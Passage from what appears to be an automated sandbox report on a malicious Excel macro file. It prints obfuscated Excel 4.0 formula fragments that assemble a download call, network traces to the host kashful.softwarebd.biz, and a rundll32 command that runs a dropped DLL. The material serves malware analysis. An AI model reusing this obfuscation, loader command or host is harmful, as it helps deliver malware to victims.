,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                    ,"=REPLACE(Doc1!AP35,7,7,""nloadTo"")","=REPLACE(Doc1!AP39,7,7,"""")","=REPLACE(#REF!AB7&#REF!AB8&#REF!AB9&#REF!AB10&#REF!AB11,7,7,""l3"")",=Doc1!AH16(),

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Feb 21, 2021 16:54:59.818917036 CET49165443192.168.2.22185.151.30.170
                    Feb 21, 2021 16:55:02.838948011 CET49165443192.168.2.22185.151.30.170
                    Feb 21, 2021 16:55:02.889533043 CET44349165185.151.30.170192.168.2.22
                    Feb 21, 2021 16:55:02.889731884 CET49165443192.168.2.22185.151.30.170
                    Feb 21, 2021 16:55:02.905287981 CET49165443192.168.2.22185.151.30.170
                    Feb 21, 2021 16:55:02.968389034 CET44349165185.151.30.170192.168.2.22
                    Feb 21, 2021 16:55:02.968441010 CET44349165185.151.30.170192.168.2.22
                    Feb 21, 2021 16:55:02.968597889 CET49165443192.168.2.22185.151.30.170
                    Feb 21, 2021 16:55:02.968636990 CET49165443192.168.2.22185.151.30.170
                    Feb 21, 2021 16:55:03.018063068 CET49165443192.168.2.22185.151.30.170
                    Feb 21, 2021 16:55:03.076534986 CET44349165185.151.30.170192.168.2.22
                    Feb 21, 2021 16:55:03.076725006 CET49165443192.168.2.22185.151.30.170
                    Feb 21, 2021 16:55:05.044658899 CET49165443192.168.2.22185.151.30.170
                    Feb 21, 2021 16:55:05.097129107 CET44349165185.151.30.170192.168.2.22
                    Feb 21, 2021 16:55:05.097173929 CET44349165185.151.30.170192.168.2.22
                    Feb 21, 2021 16:55:05.097201109 CET44349165185.151.30.170192.168.2.22
                    Feb 21, 2021 16:55:05.097322941 CET49165443192.168.2.22185.151.30.170
                    Feb 21, 2021 16:55:05.097372055 CET49165443192.168.2.22185.151.30.170
                    Feb 21, 2021 16:55:05.097379923 CET49165443192.168.2.22185.151.30.170

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Feb 21, 2021 16:54:59.731312037 CET5219753192.168.2.228.8.8.8
                    Feb 21, 2021 16:54:59.804796934 CET53521978.8.8.8192.168.2.22
                    Feb 21, 2021 16:55:03.419903040 CET5309953192.168.2.228.8.8.8
                    Feb 21, 2021 16:55:03.481419086 CET53530998.8.8.8192.168.2.22
                    Feb 21, 2021 16:55:03.494196892 CET5283853192.168.2.228.8.8.8
                    Feb 21, 2021 16:55:03.552824974 CET53528388.8.8.8192.168.2.22
                    Feb 21, 2021 16:55:03.745484114 CET6120053192.168.2.228.8.8.8
                    Feb 21, 2021 16:55:03.797121048 CET53612008.8.8.8192.168.2.22
                    Feb 21, 2021 16:55:03.808796883 CET4954853192.168.2.228.8.8.8
                    Feb 21, 2021 16:55:03.861757040 CET53495488.8.8.8192.168.2.22
                    Feb 21, 2021 16:55:04.382680893 CET5562753192.168.2.228.8.8.8
                    Feb 21, 2021 16:55:04.431427956 CET53556278.8.8.8192.168.2.22
                    Feb 21, 2021 16:55:04.442981958 CET5600953192.168.2.228.8.8.8
                    Feb 21, 2021 16:55:04.494334936 CET53560098.8.8.8192.168.2.22

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    Feb 21, 2021 16:54:59.731312037 CET192.168.2.228.8.8.80x1168Standard query (0)kashful.softwarebd.bizA (IP address)IN (0x0001)
                    Feb 21, 2021 16:55:03.419903040 CET192.168.2.228.8.8.80x2c09Standard query (0)cert.int-x1.letsencrypt.orgA (IP address)IN (0x0001)
                    Feb 21, 2021 16:55:03.494196892 CET192.168.2.228.8.8.80xd372Standard query (0)cert.int-x1.letsencrypt.orgA (IP address)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    Feb 21, 2021 16:54:59.804796934 CET8.8.8.8192.168.2.220x1168No error (0)kashful.softwarebd.biz185.151.30.170A (IP address)IN (0x0001)
                    Feb 21, 2021 16:55:03.481419086 CET8.8.8.8192.168.2.220x2c09No error (0)cert.int-x1.letsencrypt.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)
                    Feb 21, 2021 16:55:03.552824974 CET8.8.8.8192.168.2.220xd372No error (0)cert.int-x1.letsencrypt.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)

                    HTTPS Packets

                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                    Feb 21, 2021 16:55:02.968389034 CET185.151.30.170443192.168.2.2249165CN=www.stackssl.comCN=Let's Encrypt Authority X1, O=Let's Encrypt, C=USMon Mar 21 15:13:00 CET 2016Sun Jun 19 16:13:00 CEST 2016771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b

                    Code Manipulations

                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Start time:16:54:31
                    Start date:21/02/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                    Imagebase:0x13fe10000
                    File size:27641504 bytes
                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:16:54:38
                    Start date:21/02/2021
                    Path:C:\Windows\System32\rundll32.exe
                    Wow64 process (32bit):false
                    Commandline:rundll32 ..\idefje.ekfd,DllRegisterServer
                    Imagebase:0xffc30000
                    File size:45568 bytes
                    MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Code Analysis

                    Reset < >